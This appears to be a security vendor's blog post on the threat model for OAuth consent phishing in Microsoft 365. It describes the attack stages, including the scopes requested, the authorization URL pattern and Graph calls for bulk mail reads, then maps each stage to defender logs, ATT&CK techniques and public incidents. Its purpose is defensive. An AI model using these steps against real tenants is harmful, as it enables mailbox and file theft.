Home Security Microsoft 365 OAuth Consent Defense
Microsoft 365 OAuth Consent Defense Overview / Threat Model High

OAuth consent phishing against Microsoft 365 — what happens when no password is stolen

The whole attack in one paragraph

The attacker registers an application in a tenant they control. Microsoft does not charge for app registrations, so the cost of entry is zero. They give it a plausible display name ("Document Reader", "Team Calendar Sync", or a straight-up impersonation of a real vendor) set it to multi-tenant, and declare the Microsoft Graph scopes they want. Mail read. Files read. Maybe offline_access to get a refresh token. They construct an authorization URL pointing at login.microsoftonline.com, embed it in a phishing lure, and send it. The victim clicks. The victim authenticates to Microsoft normally, same SSO experience they have a hundred times a day, real green padlock, every certificate valid. The consent prompt renders, listing the app name and the requested permissions in plain English. The victim clicks Accept. Microsoft issues access and refresh tokens, signed by Microsoft, scoped to the victim's account, valid for up to 90 days. The attacker pastes the access token into their own client and starts calling Microsoft Graph from their own infrastructure. They read mail. They download files. They enumerate the directory. No password was stolen. No MFA prompt fired. From the SOC's point of view, nothing about the authentication was anomalous, because nothing about the authentication was anomalous. Everything that mattered happened during authorization, in a different table, that most detection logic never looks at.

That is the attack. It is shorter than the AiTM kill chain and nastier in one specific way: the access path is signed by Microsoft, so every defensive control built around credential theft and session integrity sits to one side of it.

Why your AiTM playbook does not catch this

If you have spent the last two years hardening against AiTM phishing (FIDO2, CAE, Token Protection, impossible-travel rules) almost none of it applies here. The reasons:

  • Phish-resistant MFA does not help. The user is not being phished for credentials. They are being phished for consent. The MFA satisfies normally on the real Microsoft endpoint. FIDO2, CAE, Token Protection, none of them gate the consent prompt.
  • Conditional Access does not fire. CA evaluates sign-in. Sign-in is legitimate. The consent click happens after CA has already passed the session through. CA-03 (auth context for sensitive admin operations) can require step-up for admin consent, but standard user consent is invisible to CA.
  • Impossible travel does not fire. The user logs in from their normal location. The attacker calls Graph from their own infrastructure. Those are two different identities to the SIEM, the user's interactive sign-in is in SigninLogs, the attacker's Graph activity is in AADServicePrincipalSignInLogs. The SP-context activity does not correlate with user geography.
  • No "suspicious login" lights up because there was no suspicious login. The consent event itself is what matters, and most SOC detection logic was not built to fire on consent events.
  • Tokens are bearer credentials. Once issued, the access token works from any IP, any user-agent, any tenant. There is no device binding by default for delegated tokens. The attacker does not need to spoof anything about the user's device.

This is the gap. The five detections in this bundle are built specifically to close it. Detection 01 fires on the consent moment itself. The other four fire on what the attacker does afterward, sign in to call Graph, add a credential to the app for persistence, read mail in volume. Each is a different point in the kill chain.

What gets captured at each stage

We mapped this end-to-end. Eight stages, each with the artifact a defender can see.

Stage 1. App registration in attacker tenant. Adversary registers a multi-tenant app in a tenant they control. Display name impersonates something legitimate. Logo is whatever they want. Publisher verification is not faked because they cannot fake it, but the absence of publisher verification is itself one of the highest-fidelity signals available, and detection 01 keys on it. Defender-visible artifact: none. This happens in the adversary's tenant, not yours.

Stage 2. Scope declaration. The app declares the OAuth scopes it will request. For mail collection: Mail.Read or Mail.ReadWrite, often with offline_access for the refresh token. For file collection: Files.Read.All, Files.ReadWrite.All, Sites.Read.All. For directory recon: User.Read.All, Group.Read.All, Directory.Read.All. For persistence (rare, requires admin consent): Application.ReadWrite.All, AppRoleAssignment.ReadWrite.All. Defender-visible artifact: none until consent is attempted.

Stage 3. Construct the consent URL. URL is https://login.microsoftonline.com/{tenant}/oauth2/v2.0/authorize?... with tenant=common so any user in any tenant gets funneled through. URL-reputation, sandbox detonation, lookalike-domain detection, none of it applies. The URL points at genuine Microsoft infrastructure.

Stage 4. Delivery. Email, Teams external chat, LinkedIn message, watering-hole compromise, replies on partners' sites. The lure is whatever gets the click. Standard email and Teams telemetry. Not the focus of this bundle.

Stage 5. User authentication and consent. This is the moment. The user clicks, authenticates normally to Microsoft, MFA satisfies. The consent prompt renders: app name, logo, publisher status, permission list in plain English. User clicks Accept. Two events fire in AuditLogs: OperationName == "Consent to application" carrying the AppId, AppDisplayName, scopes, ConsentType (User vs AllPrincipals), and the consenting user. Plus a sign-in row in SigninLogs for the auth that preceded consent. Detection 01 fires here, before a single email has been read.

Stage 6. Token issuance. Microsoft returns an access token (60 to 90 minute default) and, if offline_access was requested, a refresh token (up to 90 days, rolling). Both are bearer credentials. They contain claims for tenant ID, object ID, granted scopes, and audience. They do not by default carry device or proof-of-possession claims. No additional audit row fires beyond the consent event itself. Token issuance is invisible.

Stage 7. Adversary calls Microsoft Graph. With the access token, the attacker pulls mail (GET /me/messages?$top=999), enumerates files (GET /me/drive/root/children), reads directory data (GET /users, GET /groups). Calls authenticate as the user but the source IP is the attacker's, the user-agent is whatever client they are using, and the call volume is unlike any real user. Defender-visible artifacts: AADServicePrincipalSignInLogs for the SP-context sign-ins, AADNonInteractiveUserSignInLogs for token-refresh activity, CloudAppEvents (Defender for Cloud Apps) for object-level Graph reads, OfficeActivity for Exchange / SharePoint operations. Detections 03 and 05 fire here.

Stage 8. Optional: persistence via credential addition. If the consenting user holds a directory role (Application Administrator, Cloud Application Administrator, Global Admin), or if the tenant misconfigured app management for standard users, the attacker can add a client secret or certificate to the app. This converts delegated access (dependent on the user) into app-only access (independent of any user). Even if the original consent gets revoked, the credential keeps working against the SP. Defender-visible artifacts in AuditLogs with OperationName matching "Add service principal credentials", "Update application – Certificates and secrets management", or "Add owner to application". Detection 04 fires here, and the join against the prior 72 hours of consent events is what makes it high-fidelity, credential-add on a freshly-consented app is the canonical T1098.001 persistence signature.

Why this is harder than AiTM

AiTM takes a credential plus a session cookie. The cookie has a finite lifetime and lives on devices the defender mostly understands. CAE can revoke it in seconds. Token Protection can bind it to the device. The remediation playbook is well-understood: revoke sessions, force re-auth, the user is back to a clean state.

OAuth consent is different. The credential the attacker holds is signed by Microsoft, not by your tenant. It has a lifetime measured in months, not hours. CAE does not revoke it because CAE acts on user sessions, not on app-bound delegated tokens. The remediation requires explicit consent revocation plus SP disablement plus refresh-token revocation, in that order, and a SOC that runs credential-rotation-on-autopilot will rotate the user's password, declare the incident closed, and leave the OAuth grant in place. The attacker keeps reading mail.

The defensive answer is to fire on the consent event itself, and to make the consent event hard to obtain in the first place. That is what the rest of this bundle is for.

Mapped to ATT&CK

  • T1528. Steal Application Access Token. The consent grant itself.
  • T1550.001. Use Alternate Authentication Material: Application Access Token. Token use against Microsoft Graph.
  • T1098.001. Account Manipulation: Additional Cloud Credentials. Persistence via client secret or certificate added to the app.
  • T1098.003. Account Manipulation: Additional Cloud Roles. Role escalation by granting the app additional permissions.
  • T1078.004. Valid Accounts: Cloud Accounts. Account abuse during the access window.
  • T1114.002. Email Collection: Remote Email Collection. Mail exfiltration via Graph.
  • T1213.002. Data from Information Repositories: SharePoint. File exfiltration via Graph.

Detection 01 covers T1528. Detections 03 and 05 cover T1550.001 and T1114.002. Detection 04 covers T1098.001 and T1098.003. The hardening section covers prevention for all of them.

Four real incidents that prove the surface

We pulled four publicly documented incidents because each anchors a different point on the threat surface. A SOC analyst triaging a hit from one of the detections in this bundle should imagine these.

Google Docs OAuth worm (May 2017). A worm spread across Gmail in roughly one hour, hitting approximately one million users. The attacker registered an OAuth application called "Google Docs", visually indistinguishable from the real Google Docs in the consent prompt. Recipients saw what looked like a normal document share invitation from someone they actually knew. Click, consent, and the application immediately used the granted send-mail permission to forward itself to every contact in the victim's address book. Google killed it within an hour of public detection. Detection 02 (mass consent campaign) is calibrated specifically for this signature, five distinct users in the same tenant consenting to the same AppId within an hour. The 5/hour threshold catches this. The user-consent-restricted-to-verified-publishers control would have prevented it outright.

Verified-publisher abuse (December 2022). Threat actors fraudulently impersonated legitimate companies during enrollment in the Microsoft Cloud Partner Program, then used those fraudulent partner accounts to apply the verified-publisher attestation to OAuth applications they registered. The applications appeared in the consent prompt with the blue "verified publisher" badge, the very signal Microsoft added so users could trust which apps were legitimate. Campaign primarily targeted UK and Ireland tenants, exfiltrated mailbox content. This is the proof that publisher gating alone is not enough. Detection 01 fires on high-impact scopes regardless of publisher status, specifically because of this incident. The recommendation in the mitigations post (pair publisher gating with permission-classification gating) closes exactly this gap.

Midnight Blizzard / NOBELIUM intrusion into Microsoft (January 2024). Russia's SVR compromised Microsoft corporate systems via a multi-stage path that ended in OAuth abuse. Initial access was a password spray against a legacy non-production test tenant account that had no MFA. From that foothold, the actor identified a legacy test OAuth application that already held elevated permissions in the corporate environment, granted it the full_access_as_app Office 365 Exchange Online application role, and used the OAuth-app-bound permissions to read mailboxes belonging to Microsoft senior leadership, the cybersecurity team, and the legal team. This is the high end of the threat model. APT-grade actor combining account compromise with OAuth-app abuse for tenant-wide blast radius. Detection 04 (credential addition) catches the role-grant step. Detection 03 (SP anomalous sign-in) catches the dormancy break, the legacy test app had been silent in production use, and the dormancy-break signal is exactly what the detection keys on. The audit script Get-RiskyConsentGrants.ps1 would have surfaced the legacy app pre-incident; its risk score is tuned to elevate exactly this category of stale-but-powerful SP.

Criminal OAuth spam abuse (September 2022). Microsoft published an investigation into financially-motivated actors using malicious OAuth applications as a delivery vector for cloud-based email spam. Pattern: compromise a user account via credential stuffing against accounts without MFA, use the compromised account to consent to a malicious OAuth app, grant it send-mail permissions, then send large spam volumes from the tenant's legitimate Exchange infrastructure. Two operational benefits for the attacker: it survived password resets of the compromised users (the OAuth app held the access independently), and it used the tenant's reputation to send mail rather than the attacker's. This is the commodity end of the threat. Detection 03 fires as the malicious SP signs in from spam-sending hosting infrastructure. Detection 04 fires on the persistence step. The IR runbook in this bundle calls out explicitly: revoke consent grants and disable the SP (not just reset the user's password) because SOCs that ran credential-rotation-only on this campaign discovered the SP continued to operate.

What these four incidents teach together

A few patterns recur across all four:

  • Consent is durable. In every incident, the attacker's foothold survived events that would have remediated a password-only compromise: password rotations, MFA enrollments, even tenant-wide forced sign-outs in some cases. Consent revocation is the unique remediation for this class of attack. SOCs that do not have it in their playbook miss the persistence.
  • Trust signals are mutable. The Verified Publisher campaign proved that the strongest signal Microsoft offered to users (the green "verified" badge) was abusable when the upstream vetting process had a flaw. Detections that depend on a single signal degrade catastrophically when that signal is compromised. Detection 01 scores across multiple markers for exactly this reason.
  • Scale spans seven orders of magnitude. Google Docs hit roughly a million users in an hour. Midnight Blizzard hit a low-tens-of-accounts at a single high-value target. The same technique class spans both. Detection 02 is calibrated for the worm end of the spectrum; detections 03 and 04 are calibrated for the targeted end. A SOC needs both layered.
  • Audit cadence is the missing link. In the Midnight Blizzard case, the legacy test app had been sitting in production for years with elevated permissions and no review. Get-RiskyConsentGrants.ps1 is built specifically to surface exactly that profile. The control is doing the audit, not buying the tool, the tool just makes the audit cheap.

These are the reasons each piece of the bundle exists. Read the detection post next, the queries that fire on each of these stages, with the false-positive analysis you will need before deploying.

Want a tabletop on your tenant’s OAuth exposure?

We run two-hour tabletop sessions on what an attacker can do with a captured M365 admin account, which consent-framework settings you have versus need, and what to roll out in what order. Fixed price.

Talk to us
Share:
Next Five Sentinel detections for OAuth consent attacks (with the KQL inline)

More in Microsoft 365 OAuth Consent Defense